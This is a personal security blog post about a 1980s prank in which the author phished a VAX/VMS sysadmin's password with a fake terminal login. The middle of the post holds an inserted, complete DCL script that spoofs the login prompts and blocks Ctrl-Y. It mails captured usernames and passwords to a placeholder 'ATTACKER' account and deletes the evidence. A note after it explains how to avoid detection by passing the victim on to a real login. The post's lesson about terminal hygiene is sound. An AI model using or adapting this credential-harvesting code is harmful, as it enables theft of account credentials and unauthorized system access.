Diversionary Security Tactics: Simple Software + Social Engineering = Being Owned

The Back Story

The first security diversionary tool I personally implemented was written when I worked at former Tennessee Governor Phil Bredesen's first major company, HealthAmerica. It was before he became Governor, around 1987.

The senior systems administrator was Dennis Harms (he passed away back in 2006). Dennis was always talking about how “security-conscious” he was. As a point of background, it rather irked me that he had given the “Jr. Sys Admin” job to a favored co-worker instead of me.

The social ploy – a ruse by any other term

Finally, I got him back! Basically, I designed a fake VT220 terminal login for a VAX/VMS system and then, via “social engineering,” tricked Dennis into logging in with his system admin credentials (I used some ruse about problems logging in on that terminal).

I was extremely well-versed in DCL (Digital Command Language, the shell language for DEC VAX/VMS and Alpha minicomputers), so it was a no-brainer for me to write a “fake login screen” that looked something like this:

=== VT220 Login screen ===

Local>

The trap is set

The trick required that I remain logged into the VAX system as myself, a non-privileged user; so that I could invoke the small bit of diversionary DCL code that I had written and leave it running to capture my target.

The DCL code was very simple and, basically, it contained a “clear screen” statement and a “Local> ” prompt. After the victim pressed “Enter” one or more times, the program then prompted for “User name” and “Password,” just as a typical VT220 session would. Then, the grand finale: the program silently emailed me the system admin user name and password!

The fish takes the bait – hook, line and sinker!

Never in my wildest dreams would I have imagined it would have worked so smoothly! Dennis took the bait, logged in and the trick succeeded! I hurried back to my cubicle, looked in my email and, voila, there was the system administrator password (like having the “domain admin” password in today’s IT world) – the absolute “keys to the kingdom!”

But… so that I didn’t get burned too badly for doing it, I gave Dennis a hint. He and I had recently worked on a system error that displayed a 7-digit code and, as my “hint” to Dennis, I had the DCL code display an error with that exact 7-digit code; then I had my script log him off, so that he would realize he had been bitten by me.
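The trap described above, from the cleared screen and “Local> ” prompt through the silent email and the recognisable error followed by a logoff, as an added DCL example. This is not the author’s original script; it is a reconstruction of the steps the story gives. The attacker’s username (ATTACKER), the scratch file SYS$LOGIN:CAPTURE.TXT and the error text are assumed placeholders, and the 7-digit code the page mentions is not reproduced because the page never gives it.

```dcl
$ ! Added example: a fake DECserver "Local>" / VMS login screen in DCL.
$ ! Assumptions: ATTACKER is the attacker's username, SYS$LOGIN:CAPTURE.TXT
$ ! is a scratch file, and the final error text is a stand-in for the
$ ! 7-digit code the story refers to. Run it as @FAKELOGIN from a session
$ ! you stay logged into, then walk away from the terminal.
$ SET NOON                          ! keep running even if a command fails
$ SET NOCONTROL=Y                   ! the victim cannot Ctrl-Y out of the trap
$ SET TERMINAL/NOBROADCAST          ! no system messages spoil the illusion
$ esc[0,8] = 27                     ! ASCII ESC
$ cls = esc + "[2J" + esc + "[H"    ! VT220: clear screen, cursor home
$LOCAL:
$ WRITE SYS$OUTPUT cls
$ READ/END_OF_FILE=LOCAL/PROMPT="Local> " SYS$COMMAND line
$ ! A real DECserver would re-prompt on a blank line; here any input,
$ ! including a bare Enter, moves on to the (fake) host login.
$ WRITE SYS$OUTPUT ""
$ READ/END_OF_FILE=LOCAL/PROMPT="Username: " SYS$COMMAND user
$ SET TERMINAL/NOECHO               ! hide the password as LOGINOUT would
$ READ/END_OF_FILE=LOCAL/PROMPT="Password: " SYS$COMMAND pass
$ SET TERMINAL/ECHO
$ WRITE SYS$OUTPUT ""
$ ! Ship the captured credentials to the attacker (the "silent email").
$ OPEN/WRITE out SYS$LOGIN:CAPTURE.TXT
$ WRITE out "Username: ''user'"
$ WRITE out "Password: ''pass'"
$ CLOSE out
$ MAIL/SUBJECT="terminal" SYS$LOGIN:CAPTURE.TXT ATTACKER
$ DELETE/NOLOG SYS$LOGIN:CAPTURE.TXT;*
$ ! The "hint": show an error the victim will recognise, then log off.
$ ! (Placeholder text; the page does not reproduce the real 7-digit code.)
$ WRITE SYS$OUTPUT "%LOGIN-F-ERROR, error encountered during login"
$ WAIT 00:00:02
$ SET CONTROL=Y
$ LOGOUT
```

Two practitioner notes. First, nothing on the screen distinguishes a prompt written by a user-mode script from one written by LOGINOUT; the only thing a user can verify is that no other process is attached to the terminal, which is exactly what logging it out before use guarantees. Second, the hint at the end is what gave the game away: a script that instead handed control to a genuine login after capturing the password would leave the victim with nothing to notice, which is the point Dennis makes below.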

It didn’t take him long. I quickly printed out the system admin password, deleted the related “sent” and “received” email, and emptied the wastebasket. Just as I was pulling the password page off the printer and heading back over to the terminal, I saw Dennis coming my way, smiling that somewhat crooked smile he always smiled. Before I could hand him the printed password sheet, he said, “You burned me, didn’t you?” I smiled back and handed him the paper, saying, “I guess so, this is the System Admin password, right?”

Dennis said, “Yes, it is. You would have gotten away with it, if you had just ‘not’ displayed the error and, instead, just let the system log me in normally – I never would have known – but, you wanted me to know, didn’t you?”

The Student becomes the Teacher

I said, “Yes, Dennis, I did. Please remember: ALWAYS log off a terminal ‘before’ you start to use it, because you never know who might have left some malicious program running on it, one that might mimic a login screen, for example.” We both smiled and shook hands, and Dennis quickly moved to change the system admin password.

The point: You can never believe everything you see and, sometimes, you only see what a hacker ‘allows’ you to see! If something seems “off,” then it likely is. Never forget to follow security best practices (physical as well as software), because hackers and social engineers will “own you” when you are in your perfect “comfort zone,” just when you are sailing along without a care in the world.
